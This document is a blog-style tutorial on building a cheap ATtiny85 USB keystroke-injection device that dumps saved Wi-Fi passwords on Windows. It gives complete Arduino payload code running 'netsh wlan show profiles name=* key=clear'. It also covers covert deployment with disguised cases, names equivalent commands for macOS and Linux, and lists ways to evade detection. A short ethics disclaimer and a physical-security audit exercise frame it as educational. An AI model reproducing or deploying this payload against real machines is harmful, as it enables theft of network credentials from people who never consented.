Mastering the $2 Rubber Ducky: A Practical Guide to Wi-Fi Credential Extraction

The hum of unauthorized access attempts is a constant, a low thrum beneath the digital facade of everyday life. Networks, often seen as secure bastions, are surprisingly vulnerable to the simplest of physical intrusions. Today, we dissect a tool that thrives on this vulnerability: the $2 Rubber Ducky. This isn't about theoretical exploits; it's about a practical, hands-on approach to understanding how seemingly innocuous devices can become potent vectors for credential theft. We'll turn this cheap piece of hardware into an intelligence-gathering asset, demonstrating its capability to extract Wi-Fi passwords swiftly.

"The greatest security is the one that users don't even notice." - Unattributed

This guide is designed for the aspiring penetration tester, the bug bounty hunter, and the security professional who needs to understand the adversarial perspective. We'll walk through the setup, coding, and execution, transforming a low-cost component into a tangible cyber threat demonstration.

Table of Contents

• Introduction: The $2 Wi-Fi Credential Extractor
• Hardware Acquisition and Setup
• Software Environment: Arduino IDE & Drivers
• Payload Development: Crafting the Wi-Fi Password Stealer
• Practical Deployment: Executing the Attack Vector
• Ethical Considerations and Legal Ramifications
• Arsenal of the Operator
• Frequently Asked Questions
• The Contract: Auditing Your Network's Physical Perimeter

Introduction: The $2 Wi-Fi Credential Extractor

The digital landscape is rife with sophisticated attacks, layered defenses, and multi-stage compromises. Yet, often, the most effective exploits prey on simplicity and human oversight. The "$2 Rubber Ducky" is a prime example. This refers to a small, inexpensive microcontroller, often based on the ATtiny85 chip, that can be programmed to act as a USB Human Interface Device (HID). When plugged into a target machine, it can emulate keyboard commands, executing pre-programmed scripts at lightning speed. The allure of this device lies in its low cost and high impact potential, particularly in extracting Wi-Fi credentials. In seconds, it can automate the process of querying a system for stored network profiles, including their associated passwords. This guide will break down exactly how to achieve this, moving from acquisition to execution. Understanding this attack vector is crucial for anyone involved in *penetration testing* and *ethical hacking*, providing invaluable insight into physical security vulnerabilities.

Hardware Acquisition and Setup

The core of our operation is a cost-effective microcontroller. The ATtiny85 is the workhorse of choice for many DIY USB HID projects due to its small form factor and programmability. Acquiring these components is straightforward and economical.

• **ATtiny85 5-pack**: You can find these readily available on platforms like Amazon. They offer great value, allowing for experimentation and backup.
• ATtiny85 5-pack

Beyond the microcontroller itself, you'll need a way to program it. This typically involves a small breakout board or a dedicated development board that makes connecting to a computer via USB easier.

Software Environment: Arduino IDE & Drivers

To bring our ATtiny85 to life, we need a development environment. The Arduino IDE is a popular and accessible choice for programming microcontrollers, including the ATtiny family. 1. **Arduino IDE**: Download and install the latest version of the Arduino IDE from the official Arduino website. This integrated development environment provides a code editor, compiler, and uploader.

• Arduino IDE

2. **Board Manager URL**: To program ATtiny microcontrollers within the Arduino IDE, you need to add their support to the board manager.

• Navigate to `File > Preferences`.
• In the "Additional Boards Manager URLs" field, paste the following URL:

`https://ift.tt/2daw9FY`

• Click "OK".

3. **Install ATtiny Support**:

• Go to `Tools > Board > Boards Manager...`.
• Search for "attiny".
• Install the "attiny" package by "el Tangas".

4. **Board Configuration**:

• Once installed, go to `Tools > Board` and select "ATtiny25/45/85".
• Set the "Clock" to "8 MHz internal" (this is crucial for proper USB functionality).
• Set the "Programmer" to "USBasp" or "Micronucleus" depending on your programmer board.

5. **Digispark Drivers**: If you are using a common Digispark-compatible board (which often uses the ATtiny85), you might need specific drivers.

• Digispark Drivers
• Install these drivers following the provided instructions. This ensures your computer recognizes the microcontroller when plugged in for programming.

Payload Development: Crafting the Wi-Fi Password Stealer

The heart of the Rubber Ducky's functionality lies in its payload – the script that it executes upon connection. For Wi-Fi password extraction, we'll leverage built-in Windows commands. The process involves simulating keyboard input to open the command prompt and execute Netsh commands to dump wireless profiles. The code below is designed for Windows systems. It automates the process of retrieving saved Wi-Fi network names (SSIDs) and their corresponding passwords.

#include "DigiKeyboard.h"

// Payload to steal Wi-Fi passwords on Windows
// Requires ATtiny85, programmed as a USB HID keyboard

void setup() {
  // Initialize the DigiKeyboard library
  DigiKeyboard.delay(2000); // Wait for the system to recognize the keyboard

  // Press the Windows key and R to open the Run dialog
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // MOD_GUI_LEFT is the Windows key
  DigiKeyboard.delay(1000); // Wait for the Run dialog to appear

  // Type 'cmd' to open the Command Prompt
  DigiKeyboard.print("cmd");
  DigiKeyboard.delay(500);

  // Press Enter to open the Command Prompt
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(2000); // Wait for Command Prompt to open

  // Type the command to dump Wi-Fi profiles and passwords
  // 'netsh wlan show profiles name=* key=clear' lists all profiles and shows the cleartext key
  DigiKeyboard.print("netsh wlan show profiles name=* key=clear");
  DigiKeyboard.delay(500);

  // Press Enter to execute the command
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(2000); // Wait for the command to execute

  // Optional: Save the output to a text file
  // This command redirects the output of the previous command to a file
  // "wifi_passwords.txt" in the root of the C: drive.
  // You might need to adjust permissions or run as administrator for some systems.
  // For simplicity, we are only dumping to console.
  // To save, you would chain commands:
  // DigiKeyboard.print("netsh wlan show profiles name=* key=clear > C:\\wifi_passwords.txt");
  // DigiKeyboard.delay(500);
  // DigiKeyboard.sendKeyStroke(KEY_ENTER);
  // DigiKeyboard.delay(3000); // Wait for file write

  // Optional: Close the Command Prompt window
  // DigiKeyboard.sendKeyStroke(KEY_X, MOD_ALT); // Alt+F4 to close window
  // DigiKeyboard.delay(500);
  // DigiKeyboard.sendKeyStroke(KEY_ENTER); // Confirm closure if prompted

  // The payload ends here. The device will remain as a keyboard.
}

void loop() {
  // Nothing needs to be done in the loop for this payload.
  // The script executes once when plugged in.
}

**Explanation of the Code:**

• `#include "DigiKeyboard.h"`: Includes the library necessary for emulating keyboard input with DigiSpark boards.
• `DigiKeyboard.delay(milliseconds)`: Pauses the script execution, allowing the system time to process commands or recognize hardware.
• `DigiKeyboard.sendKeyStroke(key, modifier)`: Simulates pressing a key, optionally with modifiers like `MOD_GUI_LEFT` (Windows key).
• `DigiKeyboard.print("text")`: Types out the specified string.
• `netsh wlan show profiles name=* key=clear`: This is the core Windows command.
• `netsh`: A command-line scripting utility for configuring and displaying network configuration.
• `wlan`: Specifies the wireless LAN context.
• `show profiles`: Lists all available Wi-Fi profiles saved on the system.
• `name=*`: Applies the command to all profiles.
• `key=clear`: Crucially, this option requests that the network security keys (passwords) be displayed in plain text.

**Uploading the Code:** 1. Connect your ATtiny85 board to your computer via your programmer. 2. Select the correct board and clock settings in the Arduino IDE (`Tools > Board > ATtiny25/45/85`, `Clock > 8 MHz internal`). 3. Select your programmer (`Tools > Programmer`). 4. Click the "Upload" button.

• WiFi Password Stealer Code - *Note: This link points to a source for the code. You should implement the code as described above.*

Practical Deployment: Executing the Attack Vector

Once your ATtiny85 is programmed and encased (optional, but recommended for discretion), deployment is as simple as plugging it into a USB port on the target machine. 1. **Physical Access**: The attacker needs direct physical access to the target computer. This could be through an unattended workstation, a social engineering scenario, or insider access. 2. **USB Connection**: Plug the programmed Rubber Ducky into any available USB port. 3. **Automatic Execution**: The computer will recognize the device as a standard USB keyboard. Within seconds, the programmed script will execute automatically. The Windows key + R, followed by `cmd`, `Enter`, the `netsh` command, and another `Enter` will occur rapidly, often without any visible disruption other than the brief flicker of a Command Prompt window. 4. **Credential Retrieval**: The output showing the Wi-Fi network names and their corresponding passwords will be displayed in the Command Prompt window. An observer might miss it, or it might be too fast to read. For more covert operations, the script could be modified to save the output to a hidden file or exfiltrate it over a network connection (though this requires more complex payloads and hardware). **3D Printed Case**: For a more discreet deployment, consider using a 3D-printed case that mimics a legitimate USB drive or other small peripheral.

• 3D Printed Case

Ethical Considerations and Legal Ramifications

It is imperative to understand that using the Rubber Ducky, or any unauthorized access tool, on systems without explicit permission is illegal and unethical. This guide is purely for educational purposes, enabling security professionals to understand and defend against such threats.

• **Unauthorized Access**: Attempting to extract Wi-Fi passwords from a network or device you do not own or have explicit permission to test constitutes a criminal offense in most jurisdictions.
• **Legal Consequences**: Penalties can include hefty fines, imprisonment, and a permanent criminal record, severely impacting future employment opportunities.
• **Responsible Disclosure**: If you discover vulnerabilities in systems you are authorized to test, always follow responsible disclosure practices. Report findings to the system owner through proper channels.

Ignorance of the law is no defense. Always operate within legal and ethical boundaries.

Arsenal of the Operator

To effectively conduct security assessments and understand threat vectors like the Rubber Ducky, a well-equipped operative needs more than just the core tool. Investing in professional-grade resources significantly enhances capabilities and accuracy.

• Hardware:
• Hak5 Pineapple: For more advanced wireless attacks and network pivoting.
• Thermite Nano: Another compact HID device for executing payloads.
• Software:
• Kali Linux: A comprehensive penetration testing distribution pre-loaded with essential tools.
• Wireshark: For deep packet analysis and network traffic inspection.
• Burp Suite Professional: The industry standard for web application security testing. While not directly used for the Rubber Ducky itself, it's essential for broader pentesting engagements.
• Certifications:
• OSCP (Offensive Security Certified Professional): Hands-on, challenging certification that tests practical penetration testing skills.
• CompTIA Security+: A foundational certification covering core security concepts.
• CEH (Certified Ethical Hacker): A widely recognized certification focusing on ethical hacking methodologies.
• Books:
• Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman
• The Hacker Playbook 3: Practical Guide to Penetration Testing by Peter Kim
• Hacking: The Art of Exploitation, 2nd Edition by Jon Erickson
• The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws by Dafydd Stuttard and Marcus Pinto
• Real-World Bug Hunting: A Field Guide to Web Hacking by Peter Yaworski
• Social Engineering: The Science of Human Hacking by Christopher Hadnagy
• Linux Basics for Hackers: Penetration Testing,)], Linux, and--Open Source Tools by OccupyTheWeb
• Python Crash Course, 2nd Edition: A Hands-On, Project-Based Introduction to Programming by Eric Matthes
• Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Researchers by TJ O'Connor
• Black Hat Python: Python Programming for Hackers and Pentesters by Justin Seitz

These resources are not merely tools; they represent an investment in expertise and a commitment to professional development. For serious engagements and a deeper understanding of the threat landscape, acquiring and mastering these items is paramount.

Frequently Asked Questions

Q1: Can this Rubber Ducky attack Mac or Linux systems?
A1: The provided payload is specifically for Windows. Different commands and scripting methods would be required for macOS (e.g., using `security find-generic-password` in Terminal) and Linux (e.g., parsing `/etc/NetworkManager/system-connections/` or similar configuration files). The ATtiny85 can still emulate keyboard input on these systems, but the payload must be tailored.

Q2: Is the ATtiny85's memory sufficient for complex payloads?
A2: The ATtiny85 has very limited memory (8KB flash, 512 bytes RAM). For simple, direct keyboard emulation like this password stealer, it's adequate. For more complex tasks, larger microcontrollers like ESP32 or Raspberry Pi Zero W are necessary, offering more processing power and memory.

Q3: How can I detect or prevent a Rubber Ducky attack?
A3: Physical security is the primary defense. Limit unauthorized USB access, use security policies that restrict USB device usage, and consider USB port blocking. Endpoint detection and response (EDR) solutions can sometimes detect unusual keyboard activity or command execution patterns. Regular security awareness training for employees is also crucial.

Q4: Can the script be modified to avoid detection?
A4: Yes, advanced techniques include adding longer delays, obfuscating commands, using different HID devices, or triggering the payload only under specific conditions. However, sophisticated detection mechanisms can often still identify malicious HID activity.

The Contract: Auditing Your Network's Physical Perimeter

This exercise with the $2 Rubber Ducky highlights a critical, yet often overlooked, aspect of cybersecurity: physical security. The digital defenses we build are only as strong as the physical perimeter that protects them. Your contract, should you choose to accept it, is to critically evaluate your organization's physical security posture. Your Mission: Conduct a mini-audit of physical access points to your network. Consider:

1. Unattended Workstations: How easily could someone plug a USB device into an active, logged-in machine?
2. Guest/Public Access Areas: Are there any accessible ports in shared or public spaces?
3. Visitor Policies: What are the rules regarding visitor device usage and USB ports?
4. Remote Employees: How are physical security risks managed in home environments?

Document potential physical attack vectors and propose actionable mitigation strategies. Remember, the most effective defense starts with understanding the threats, both digital and physical. Your vigilance is the first line of defense.